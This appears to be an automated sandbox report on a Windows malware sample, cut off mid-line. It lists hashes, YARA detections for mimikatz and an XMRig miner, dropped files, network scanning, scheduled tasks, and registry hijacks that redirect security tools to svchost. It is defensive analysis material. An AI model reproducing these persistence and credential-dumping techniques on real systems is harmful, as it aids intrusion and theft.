Analysis
-
max time kernel
150s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20240508-en -
resource tags
arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system -
submitted
21/05/2024, 02:50
Behavioral task
behavioral1
Sample
2024-05-21_91d710a684656f192c935f5c7767cf34_hacktools_icedid_mimikatz.exe
Resource
win7-20240220-en
General
-
Target
2024-05-21_91d710a684656f192c935f5c7767cf34_hacktools_icedid_mimikatz.exe
-
Size
7.7MB
-
MD5
91d710a684656f192c935f5c7767cf34
-
SHA1
94ba9cc8cf6dd32be943520fff983516386394dd
-
SHA256
9e37bfb8643d9720c5ca060ba9b4b75062f10cfd94f2b663bacce9f48568758a
-
SHA512
66612a2cd8eaec657c94c256d2515d6ae999342ce8e9b50288760c18db2ac3ed92a3b522c088f6095a4787ebc188acb2e32e3d69c15b267610c5851ee64dd5b2
-
SSDEEP
196608:MxygkmknGzwHdOgEPHd9BRX/nivPlTXTYo:Y5jz0E51/iv1
Malware Config
Signatures
-
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description pid Process procid_target PID 1912 created 2084 1912 detvrlv.exe 37 -
Contacts a large (30415) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Detects executables containing SQL queries to confidential data stores. Observed in infostealers 2 IoCs
resource yara_rule behavioral2/memory/1664-136-0x00007FF6B1D30000-0x00007FF6B1E1E000-memory.dmp INDICATOR_SUSPICIOUS_EXE_SQLQuery_ConfidentialDataStore behavioral2/memory/1664-137-0x00007FF6B1D30000-0x00007FF6B1E1E000-memory.dmp INDICATOR_SUSPICIOUS_EXE_SQLQuery_ConfidentialDataStore -
UPX dump on OEP (original entry point) 43 IoCs
resource yara_rule behavioral2/memory/464-0-0x0000000000400000-0x0000000000A9B000-memory.dmp UPX behavioral2/memory/464-4-0x0000000000400000-0x0000000000A9B000-memory.dmp UPX behavioral2/files/0x000800000002351d-6.dat UPX behavioral2/memory/2692-8-0x0000000000400000-0x0000000000A9B000-memory.dmp UPX behavioral2/memory/1664-136-0x00007FF6B1D30000-0x00007FF6B1E1E000-memory.dmp UPX behavioral2/files/0x0007000000023570-134.dat UPX behavioral2/memory/1664-137-0x00007FF6B1D30000-0x00007FF6B1E1E000-memory.dmp UPX behavioral2/memory/1552-141-0x00007FF6DEAA0000-0x00007FF6DEAFB000-memory.dmp UPX behavioral2/files/0x000700000002357b-140.dat UPX behavioral2/memory/1552-155-0x00007FF6DEAA0000-0x00007FF6DEAFB000-memory.dmp UPX behavioral2/files/0x0007000000023578-163.dat UPX behavioral2/memory/2316-164-0x00007FF6D6980000-0x00007FF6D6AA0000-memory.dmp UPX behavioral2/memory/380-170-0x00007FF6DEAA0000-0x00007FF6DEAFB000-memory.dmp UPX behavioral2/memory/3764-174-0x00007FF6DEAA0000-0x00007FF6DEAFB000-memory.dmp UPX behavioral2/memory/4328-178-0x00007FF6DEAA0000-0x00007FF6DEAFB000-memory.dmp UPX behavioral2/memory/2316-181-0x00007FF6D6980000-0x00007FF6D6AA0000-memory.dmp UPX behavioral2/memory/4308-183-0x00007FF6DEAA0000-0x00007FF6DEAFB000-memory.dmp UPX behavioral2/memory/1540-187-0x00007FF6DEAA0000-0x00007FF6DEAFB000-memory.dmp UPX behavioral2/memory/1228-191-0x00007FF6DEAA0000-0x00007FF6DEAFB000-memory.dmp UPX behavioral2/memory/2316-193-0x00007FF6D6980000-0x00007FF6D6AA0000-memory.dmp UPX behavioral2/memory/3940-196-0x00007FF6DEAA0000-0x00007FF6DEAFB000-memory.dmp UPX behavioral2/memory/2316-199-0x00007FF6D6980000-0x00007FF6D6AA0000-memory.dmp UPX behavioral2/memory/2364-201-0x00007FF6DEAA0000-0x00007FF6DEAFB000-memory.dmp UPX behavioral2/memory/4364-205-0x00007FF6DEAA0000-0x00007FF6DEAFB000-memory.dmp UPX behavioral2/memory/2820-213-0x00007FF6DEAA0000-0x00007FF6DEAFB000-memory.dmp UPX behavioral2/memory/2316-215-0x00007FF6D6980000-0x00007FF6D6AA0000-memory.dmp UPX behavioral2/memory/1624-218-0x00007FF6DEAA0000-0x00007FF6DEAFB000-memory.dmp UPX behavioral2/memory/2316-220-0x00007FF6D6980000-0x00007FF6D6AA0000-memory.dmp UPX behavioral2/memory/224-223-0x00007FF6DEAA0000-0x00007FF6DEAFB000-memory.dmp UPX behavioral2/memory/2364-227-0x00007FF6DEAA0000-0x00007FF6DEAFB000-memory.dmp UPX behavioral2/memory/2448-230-0x00007FF6DEAA0000-0x00007FF6DEAFB000-memory.dmp UPX behavioral2/memory/2316-231-0x00007FF6D6980000-0x00007FF6D6AA0000-memory.dmp UPX behavioral2/memory/3284-233-0x00007FF6DEAA0000-0x00007FF6DEAFB000-memory.dmp UPX behavioral2/memory/3176-235-0x00007FF6DEAA0000-0x00007FF6DEAFB000-memory.dmp UPX behavioral2/memory/3056-237-0x00007FF6DEAA0000-0x00007FF6DEAFB000-memory.dmp UPX behavioral2/memory/5428-249-0x00007FF6DEAA0000-0x00007FF6DEAFB000-memory.dmp UPX behavioral2/memory/2316-250-0x00007FF6D6980000-0x00007FF6D6AA0000-memory.dmp UPX behavioral2/memory/6308-253-0x00007FF6DEAA0000-0x00007FF6DEAFB000-memory.dmp UPX behavioral2/memory/2316-254-0x00007FF6D6980000-0x00007FF6D6AA0000-memory.dmp UPX behavioral2/memory/2316-257-0x00007FF6D6980000-0x00007FF6D6AA0000-memory.dmp UPX behavioral2/memory/2316-307-0x00007FF6D6980000-0x00007FF6D6AA0000-memory.dmp UPX behavioral2/memory/2316-312-0x00007FF6D6980000-0x00007FF6D6AA0000-memory.dmp UPX behavioral2/memory/2316-314-0x00007FF6D6980000-0x00007FF6D6AA0000-memory.dmp UPX -
XMRig Miner payload 12 IoCs
resource yara_rule behavioral2/memory/2316-181-0x00007FF6D6980000-0x00007FF6D6AA0000-memory.dmp xmrig behavioral2/memory/2316-193-0x00007FF6D6980000-0x00007FF6D6AA0000-memory.dmp xmrig behavioral2/memory/2316-199-0x00007FF6D6980000-0x00007FF6D6AA0000-memory.dmp xmrig behavioral2/memory/2316-215-0x00007FF6D6980000-0x00007FF6D6AA0000-memory.dmp xmrig behavioral2/memory/2316-220-0x00007FF6D6980000-0x00007FF6D6AA0000-memory.dmp xmrig behavioral2/memory/2316-231-0x00007FF6D6980000-0x00007FF6D6AA0000-memory.dmp xmrig behavioral2/memory/2316-250-0x00007FF6D6980000-0x00007FF6D6AA0000-memory.dmp xmrig behavioral2/memory/2316-254-0x00007FF6D6980000-0x00007FF6D6AA0000-memory.dmp xmrig behavioral2/memory/2316-257-0x00007FF6D6980000-0x00007FF6D6AA0000-memory.dmp xmrig behavioral2/memory/2316-307-0x00007FF6D6980000-0x00007FF6D6AA0000-memory.dmp xmrig behavioral2/memory/2316-312-0x00007FF6D6980000-0x00007FF6D6AA0000-memory.dmp xmrig behavioral2/memory/2316-314-0x00007FF6D6980000-0x00007FF6D6AA0000-memory.dmp xmrig -
mimikatz is an open source tool to dump credentials on Windows 6 IoCs
resource yara_rule behavioral2/memory/464-0-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral2/memory/464-4-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral2/files/0x000800000002351d-6.dat mimikatz behavioral2/memory/2692-8-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral2/memory/1664-136-0x00007FF6B1D30000-0x00007FF6B1E1E000-memory.dmp mimikatz behavioral2/memory/1664-137-0x00007FF6B1D30000-0x00007FF6B1E1E000-memory.dmp mimikatz -
Drops file in Drivers directory 3 IoCs
description ioc Process File opened for modification C:\Windows\system32\drivers\etc\hosts detvrlv.exe File created C:\Windows\system32\drivers\npf.sys wpcap.exe File created C:\Windows\system32\drivers\etc\hosts detvrlv.exe -
Modifies Windows Firewall 2 TTPs 2 IoCs
pid Process 2028 netsh.exe 1600 netsh.exe -
Sets file execution options in registry 2 TTPs 40 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe detvrlv.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" detvrlv.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" detvrlv.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe detvrlv.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" detvrlv.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" detvrlv.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe detvrlv.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe detvrlv.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe detvrlv.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe detvrlv.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe detvrlv.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" detvrlv.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe detvrlv.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe detvrlv.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe detvrlv.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" detvrlv.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe detvrlv.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe detvrlv.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe detvrlv.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe detvrlv.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" detvrlv.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe detvrlv.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe detvrlv.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" detvrlv.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" detvrlv.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" detvrlv.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" detvrlv.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" detvrlv.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe detvrlv.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" detvrlv.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" detvrlv.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe detvrlv.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" detvrlv.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" detvrlv.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe detvrlv.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe detvrlv.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" detvrlv.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" detvrlv.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" detvrlv.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" detvrlv.exe -
Executes dropped EXE 31 IoCs
pid Process 2692 detvrlv.exe 1912 detvrlv.exe 3788 wpcap.exe 2736 iuatpesve.exe 1664 vfshost.exe 1552 kirzyyvlv.exe 3188 xohudmc.exe 1544 ascsso.exe 2316 eilgmk.exe 380 kirzyyvlv.exe 3764 kirzyyvlv.exe 4328 kirzyyvlv.exe 4308 kirzyyvlv.exe 1540 kirzyyvlv.exe 1228 kirzyyvlv.exe 3940 kirzyyvlv.exe 2364 kirzyyvlv.exe 4364 kirzyyvlv.exe 4328 detvrlv.exe 2820 kirzyyvlv.exe 1624 kirzyyvlv.exe 224 kirzyyvlv.exe 2364 kirzyyvlv.exe 2448 kirzyyvlv.exe 3284 kirzyyvlv.exe 3176 kirzyyvlv.exe 3056 kirzyyvlv.exe 2620 ebkkcpcil.exe 5428 kirzyyvlv.exe 6308 kirzyyvlv.exe 6840 detvrlv.exe -
Loads dropped DLL 12 IoCs
pid Process 3788 wpcap.exe 3788 wpcap.exe 3788 wpcap.exe 3788 wpcap.exe 3788 wpcap.exe 3788 wpcap.exe 3788 wpcap.exe 3788 wpcap.exe 3788 wpcap.exe 2736 iuatpesve.exe 2736 iuatpesve.exe 2736 iuatpesve.exe -
resource yara_rule behavioral2/memory/1664-136-0x00007FF6B1D30000-0x00007FF6B1E1E000-memory.dmp upx behavioral2/files/0x0007000000023570-134.dat upx behavioral2/memory/1664-137-0x00007FF6B1D30000-0x00007FF6B1E1E000-memory.dmp upx behavioral2/memory/1552-141-0x00007FF6DEAA0000-0x00007FF6DEAFB000-memory.dmp upx behavioral2/files/0x000700000002357b-140.dat upx behavioral2/memory/1552-155-0x00007FF6DEAA0000-0x00007FF6DEAFB000-memory.dmp upx behavioral2/files/0x0007000000023578-163.dat upx behavioral2/memory/2316-164-0x00007FF6D6980000-0x00007FF6D6AA0000-memory.dmp upx behavioral2/memory/380-170-0x00007FF6DEAA0000-0x00007FF6DEAFB000-memory.dmp upx behavioral2/memory/3764-174-0x00007FF6DEAA0000-0x00007FF6DEAFB000-memory.dmp upx behavioral2/memory/4328-178-0x00007FF6DEAA0000-0x00007FF6DEAFB000-memory.dmp upx behavioral2/memory/2316-181-0x00007FF6D6980000-0x00007FF6D6AA0000-memory.dmp upx behavioral2/memory/4308-183-0x00007FF6DEAA0000-0x00007FF6DEAFB000-memory.dmp upx behavioral2/memory/1540-187-0x00007FF6DEAA0000-0x00007FF6DEAFB000-memory.dmp upx behavioral2/memory/1228-191-0x00007FF6DEAA0000-0x00007FF6DEAFB000-memory.dmp upx behavioral2/memory/2316-193-0x00007FF6D6980000-0x00007FF6D6AA0000-memory.dmp upx behavioral2/memory/3940-196-0x00007FF6DEAA0000-0x00007FF6DEAFB000-memory.dmp upx behavioral2/memory/2316-199-0x00007FF6D6980000-0x00007FF6D6AA0000-memory.dmp upx behavioral2/memory/2364-201-0x00007FF6DEAA0000-0x00007FF6DEAFB000-memory.dmp upx behavioral2/memory/4364-205-0x00007FF6DEAA0000-0x00007FF6DEAFB000-memory.dmp upx behavioral2/memory/2820-213-0x00007FF6DEAA0000-0x00007FF6DEAFB000-memory.dmp upx behavioral2/memory/2316-215-0x00007FF6D6980000-0x00007FF6D6AA0000-memory.dmp upx behavioral2/memory/1624-218-0x00007FF6DEAA0000-0x00007FF6DEAFB000-memory.dmp upx behavioral2/memory/2316-220-0x00007FF6D6980000-0x00007FF6D6AA0000-memory.dmp upx behavioral2/memory/224-223-0x00007FF6DEAA0000-0x00007FF6DEAFB000-memory.dmp upx behavioral2/memory/2364-227-0x00007FF6DEAA0000-0x00007FF6DEAFB000-memory.dmp upx behavioral2/memory/2448-230-0x00007FF6DEAA0000-0x00007FF6DEAFB000-memory.dmp upx behavioral2/memory/2316-231-0x00007FF6D6980000-0x00007FF6D6AA0000-memory.dmp upx behavioral2/memory/3284-233-0x00007FF6DEAA0000-0x00007FF6DEAFB000-memory.dmp upx behavioral2/memory/3176-235-0x00007FF6DEAA0000-0x00007FF6DEAFB000-memory.dmp upx behavioral2/memory/3056-237-0x00007FF6DEAA0000-0x00007FF6DEAFB000-memory.dmp upx behavioral2/memory/5428-249-0x00007FF6DEAA0000-0x00007FF6DEAFB000-memory.dmp upx behavioral2/memory/2316-250-0x00007FF6D6980000-0x00007FF6D6AA0000-memory.dmp upx behavioral2/memory/6308-253-0x00007FF6DEAA0000-0x00007FF6DEAFB000-memory.dmp upx behavioral2/memory/2316-254-0x00007FF6D6980000-0x00007FF6D6AA0000-memory.dmp upx behavioral2/memory/2316-257-0x00007FF6D6980000-0x00007FF6D6AA0000-memory.dmp upx behavioral2/memory/2316-307-0x00007FF6D6980000-0x00007FF6D6AA0000-memory.dmp upx behavioral2/memory/2316-312-0x00007FF6D6980000-0x00007FF6D6AA0000-memory.dmp upx behavioral2/memory/2316-314-0x00007FF6D6980000-0x00007FF6D6AA0000-memory.dmp upx -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 78 ifconfig.me 79 ifconfig.me -
Creates a Windows Service
-
Drops file in System32 directory 18 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies detvrlv.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft detvrlv.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData detvrlv.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 detvrlv.exe File created C:\Windows\SysWOW64\pthreadVC.dll wpcap.exe File created C:\Windows\system32\wpcap.dll wpcap.exe File created C:\Windows\SysWOW64\ascsso.exe xohudmc.exe File opened for modification C:\Windows\SysWOW64\ascsso.exe xohudmc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 detvrlv.exe File created C:\Windows\SysWOW64\Packet.dll wpcap.exe File created C:\Windows\system32\Packet.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE detvrlv.exe File created C:\Windows\SysWOW64\wpcap.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache detvrlv.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content detvrlv.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\2326C1864DE719190C396A6E8734D8B4 detvrlv.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 detvrlv.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\2326C1864DE719190C396A6E8734D8B4 detvrlv.exe -
Drops file in Program Files directory 3 IoCs
description ioc Process File created C:\Program Files\WinPcap\rpcapd.exe wpcap.exe File created C:\Program Files\WinPcap\LICENSE wpcap.exe File created C:\Program Files\WinPcap\uninstall.exe wpcap.exe -
Drops file in Windows directory 60 IoCs
description ioc Process File created C:\Windows\nmrmyinid\mirzmlbjb\ebkkcpcil.exe detvrlv.exe File created C:\Windows\nmrmyinid\upbdrjv\swrpwe.exe detvrlv.exe File created C:\Windows\nmrmyinid\UnattendGC\spoolsrv.xml detvrlv.exe File created C:\Windows\munqipvc\docmicfg.xml detvrlv.exe File created C:\Windows\nmrmyinid\Corporate\mimidrv.sys detvrlv.exe File created C:\Windows\nmrmyinid\mirzmlbjb\wpcap.dll detvrlv.exe File created C:\Windows\nmrmyinid\UnattendGC\specials\ssleay32.dll detvrlv.exe File created C:\Windows\nmrmyinid\UnattendGC\specials\svschost.exe detvrlv.exe File created C:\Windows\nmrmyinid\UnattendGC\svschost.xml detvrlv.exe File created C:\Windows\nmrmyinid\UnattendGC\schoedcl.xml detvrlv.exe File opened for modification C:\Windows\munqipvc\svschost.xml detvrlv.exe File created C:\Windows\nmrmyinid\UnattendGC\specials\vimpcsvc.xml detvrlv.exe File created C:\Windows\nmrmyinid\mirzmlbjb\scan.bat detvrlv.exe File created C:\Windows\nmrmyinid\mirzmlbjb\wpcap.exe detvrlv.exe File created C:\Windows\nmrmyinid\UnattendGC\specials\crli-0.dll detvrlv.exe File created C:\Windows\nmrmyinid\UnattendGC\specials\tucl-1.dll detvrlv.exe File created C:\Windows\nmrmyinid\UnattendGC\docmicfg.xml detvrlv.exe File opened for modification C:\Windows\munqipvc\detvrlv.exe 2024-05-21_91d710a684656f192c935f5c7767cf34_hacktools_icedid_mimikatz.exe File created C:\Windows\nmrmyinid\UnattendGC\specials\docmicfg.xml detvrlv.exe File opened for modification C:\Windows\munqipvc\docmicfg.xml detvrlv.exe File created C:\Windows\munqipvc\schoedcl.xml detvrlv.exe File created C:\Windows\nmrmyinid\UnattendGC\Shellcode.ini detvrlv.exe File created C:\Windows\nmrmyinid\Corporate\vfshost.exe detvrlv.exe File created C:\Windows\nmrmyinid\UnattendGC\specials\schoedcl.exe detvrlv.exe File created C:\Windows\nmrmyinid\UnattendGC\vimpcsvc.xml detvrlv.exe File created C:\Windows\nmrmyinid\mirzmlbjb\Packet.dll detvrlv.exe File created C:\Windows\nmrmyinid\UnattendGC\specials\coli-0.dll detvrlv.exe File created C:\Windows\nmrmyinid\UnattendGC\specials\spoolsrv.exe detvrlv.exe File created C:\Windows\nmrmyinid\UnattendGC\specials\vimpcsvc.exe detvrlv.exe File opened for modification C:\Windows\munqipvc\spoolsrv.xml detvrlv.exe File created C:\Windows\ime\detvrlv.exe detvrlv.exe File created C:\Windows\nmrmyinid\UnattendGC\specials\libeay32.dll detvrlv.exe File created C:\Windows\nmrmyinid\UnattendGC\specials\svschost.xml detvrlv.exe File created C:\Windows\nmrmyinid\UnattendGC\specials\spoolsrv.xml detvrlv.exe File created C:\Windows\munqipvc\spoolsrv.xml detvrlv.exe File opened for modification C:\Windows\nmrmyinid\Corporate\log.txt cmd.exe File created C:\Windows\nmrmyinid\UnattendGC\specials\libxml2.dll detvrlv.exe File created C:\Windows\nmrmyinid\UnattendGC\specials\schoedcl.xml detvrlv.exe File opened for modification C:\Windows\munqipvc\vimpcsvc.xml detvrlv.exe File created C:\Windows\nmrmyinid\UnattendGC\AppCapture32.dll detvrlv.exe File created C:\Windows\nmrmyinid\mirzmlbjb\iuatpesve.exe detvrlv.exe File created C:\Windows\nmrmyinid\UnattendGC\specials\exma-1.dll detvrlv.exe File created C:\Windows\nmrmyinid\UnattendGC\specials\ucl.dll detvrlv.exe File created C:\Windows\munqipvc\detvrlv.exe 2024-05-21_91d710a684656f192c935f5c7767cf34_hacktools_icedid_mimikatz.exe File created C:\Windows\nmrmyinid\UnattendGC\specials\trfo-2.dll detvrlv.exe File created C:\Windows\nmrmyinid\UnattendGC\specials\xdvl-0.dll detvrlv.exe File created C:\Windows\nmrmyinid\mirzmlbjb\ip.txt detvrlv.exe File created C:\Windows\nmrmyinid\UnattendGC\AppCapture64.dll detvrlv.exe File created C:\Windows\nmrmyinid\Corporate\mimilib.dll detvrlv.exe File opened for modification C:\Windows\nmrmyinid\mirzmlbjb\Result.txt ebkkcpcil.exe File opened for modification C:\Windows\nmrmyinid\mirzmlbjb\Packet.dll detvrlv.exe File created C:\Windows\nmrmyinid\UnattendGC\specials\posh-0.dll detvrlv.exe File created C:\Windows\nmrmyinid\UnattendGC\specials\trch-1.dll detvrlv.exe File created C:\Windows\munqipvc\svschost.xml detvrlv.exe File created C:\Windows\nmrmyinid\UnattendGC\specials\tibe-2.dll detvrlv.exe File created C:\Windows\nmrmyinid\UnattendGC\specials\docmicfg.exe detvrlv.exe File created C:\Windows\nmrmyinid\UnattendGC\specials\cnli-1.dll detvrlv.exe File created C:\Windows\nmrmyinid\UnattendGC\specials\zlib1.dll detvrlv.exe File opened for modification C:\Windows\munqipvc\schoedcl.xml detvrlv.exe File created C:\Windows\munqipvc\vimpcsvc.xml detvrlv.exe -
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 2364 sc.exe 5112 sc.exe 748 sc.exe 3768 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
NSIS installer 3 IoCs
resource yara_rule behavioral2/files/0x000800000002351d-6.dat nsis_installer_2 behavioral2/files/0x0011000000023534-15.dat nsis_installer_1 behavioral2/files/0x0011000000023534-15.dat nsis_installer_2 -
Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2720 schtasks.exe 4576 schtasks.exe 4612 schtasks.exe -
Modifies data under HKEY_USERS 49 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump kirzyyvlv.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing kirzyyvlv.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" detvrlv.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump kirzyyvlv.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" kirzyyvlv.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump kirzyyvlv.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump kirzyyvlv.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump kirzyyvlv.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump kirzyyvlv.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" kirzyyvlv.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump kirzyyvlv.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" detvrlv.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" kirzyyvlv.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" kirzyyvlv.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" kirzyyvlv.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump kirzyyvlv.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = 